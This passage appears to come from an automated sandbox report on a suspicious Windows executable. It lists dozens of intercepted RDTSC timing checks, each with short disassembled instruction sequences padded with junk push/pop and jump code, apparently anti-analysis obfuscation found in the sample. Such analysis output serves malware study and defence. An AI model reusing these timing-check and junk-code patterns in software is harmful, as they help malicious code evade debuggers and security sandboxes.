                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 99C123 second address: 99C13A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A750h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9A2397 second address: 9A23B2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE5B8D9CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE5B8D9CB61h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9A23B2 second address: 9A23B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9A23B7 second address: 9A23BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 926633 second address: 926639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 926639 second address: 92665C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE5B8D9CB5Dh 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jc 00007FE5B8D9CB56h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9A0D6D second address: 9A0D8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A756h 0x00000009 jl 00007FE5B8F4A746h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9A0D8D second address: 9A0DB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB61h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE5B8D9CB60h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9A1097 second address: 9A10C0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE5B8F4A74Ch 0x0000000f jmp 00007FE5B8F4A753h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9A10C0 second address: 9A10D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FE5B8D9CB5Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9A1368 second address: 9A1370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9A14DA second address: 9A14E4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE5B8D9CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9A1795 second address: 9A17B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FE5B8F4A74Eh 0x0000000b pushad 0x0000000c popad 0x0000000d ja 00007FE5B8F4A746h 0x00000013 jg 00007FE5B8F4A75Ah 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9A193E second address: 9A1951 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE5B8D9CB5Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9A1D54 second address: 9A1D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 94D01B second address: 94D033 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE5B8D9CB5Eh 0x00000008 jc 00007FE5B8D9CB5Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9A8ECE second address: 9A8EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FE5B8F4A74Dh 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 965F18 second address: 94C57B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jns 00007FE5B8D9CB56h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FE5B8D9CB58h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov dword ptr [ebp+12458CBDh], ecx 0x0000002d lea eax, dword ptr [ebp+1247AB89h] 0x00000033 adc dx, 93BAh 0x00000038 nop 0x00000039 jmp 00007FE5B8D9CB65h 0x0000003e push eax 0x0000003f pushad 0x00000040 jc 00007FE5B8D9CB58h 0x00000046 jc 00007FE5B8D9CB58h 0x0000004c popad 0x0000004d nop 0x0000004e jmp 00007FE5B8D9CB5Ah 0x00000053 call dword ptr [ebp+122D2F4Fh] 0x00000059 push esi 0x0000005a jg 00007FE5B8D9CB58h 0x00000060 pushad 0x00000061 popad 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 966582 second address: 96659B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE5B8F4A748h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007FE5B8F4A746h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96659B second address: 96659F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96659F second address: 9665AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9665AE second address: 9665D8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FE5B8D9CB6Ch 0x00000014 jmp 00007FE5B8D9CB66h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9665D8 second address: 9665E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A74Dh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96669A second address: 9666A4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9666A4 second address: 9666A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9666E5 second address: 9666E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9666E9 second address: 9666EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9666EF second address: 966701 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 je 00007FE5B8D9CB5Eh 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9667D0 second address: 966809 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE5B8F4A756h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007FE5B8F4A752h 0x00000017 popad 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 966809 second address: 966818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 966818 second address: 96681C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96681C second address: 966838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [eax] 0x00000009 jno 00007FE5B8D9CB5Ah 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 966838 second address: 96683C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 966AB5 second address: 966ABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 966F81 second address: 966F8E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 967293 second address: 9672B5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ecx, dword ptr [ebp+122D284Dh] 0x00000010 lea eax, dword ptr [ebp+1247ABCDh] 0x00000016 mov dword ptr [ebp+1244B5FAh], ebx 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push edi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9672B5 second address: 9672BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9A9197 second address: 9A91A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE5B8D9CB5Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9A91A7 second address: 9A91B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push esi 0x00000008 jns 00007FE5B8F4A746h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9A9798 second address: 9A979C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9A979C second address: 9A97BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE5B8F4A758h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9A9C5A second address: 9A9C73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB65h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9A9C73 second address: 9A9C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE5B8F4A757h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9A9C90 second address: 9A9CAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8D9CB65h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9A9CAB second address: 9A9CB8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9B328F second address: 9B3299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9B2E3E second address: 9B2E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9B2E43 second address: 9B2E60 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jc 00007FE5B8D9CB56h 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jo 00007FE5B8D9CB62h 0x00000015 js 00007FE5B8D9CB56h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9B5286 second address: 9B528A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9B528A second address: 9B528E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9B528E second address: 9B52A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FE5B8F4A74Ah 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9B52A5 second address: 9B52AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9B546F second address: 9B547E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jnp 00007FE5B8F4A74Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9B547E second address: 9B5488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9B5488 second address: 9B548C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9B548C second address: 9B54A7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE5B8D9CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE5B8D9CB5Eh 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BC168 second address: 9BC18D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007FE5B8F4A757h 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BC18D second address: 9BC1A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE5B8D9CB64h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BC1A7 second address: 9BC1BD instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007FE5B8F4A74Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BC1BD second address: 9BC1C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BAAA9 second address: 9BAAAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BAAAD second address: 9BAAB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BAAB1 second address: 9BAACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE5B8F4A750h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BAACB second address: 9BAAD1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BAAD1 second address: 9BAAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BAAD7 second address: 9BAAE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8D9CB5Bh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BAAE6 second address: 9BAB0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A752h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnc 00007FE5B8F4A746h 0x00000012 jl 00007FE5B8F4A746h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BAC29 second address: 9BAC2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BAC2D second address: 9BAC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BAC33 second address: 9BAC3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BAEF4 second address: 9BAEFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BAEFA second address: 9BAF05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BAF05 second address: 9BAF0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BB1F0 second address: 9BB1F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BB1F5 second address: 9BB1FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BB1FB second address: 9BB1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 966CBF second address: 966CC9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 966CC9 second address: 966CDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FE5B8D9CB56h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BB4A5 second address: 9BB4AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BB4AB second address: 9BB4BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE5B8D9CB5Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BF9A3 second address: 9BF9BC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007FE5B8F4A74Fh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BFB23 second address: 9BFB27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9C3221 second address: 9C3225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9C3225 second address: 9C323C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE5B8D9CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE5B8D9CB5Dh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9C2C24 second address: 9C2C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9CA669 second address: 9CA66E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9CAA8C second address: 9CAAC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE5B8F4A74Ah 0x00000009 popad 0x0000000a jmp 00007FE5B8F4A757h 0x0000000f jl 00007FE5B8F4A74Ch 0x00000015 jg 00007FE5B8F4A746h 0x0000001b popad 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pop edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
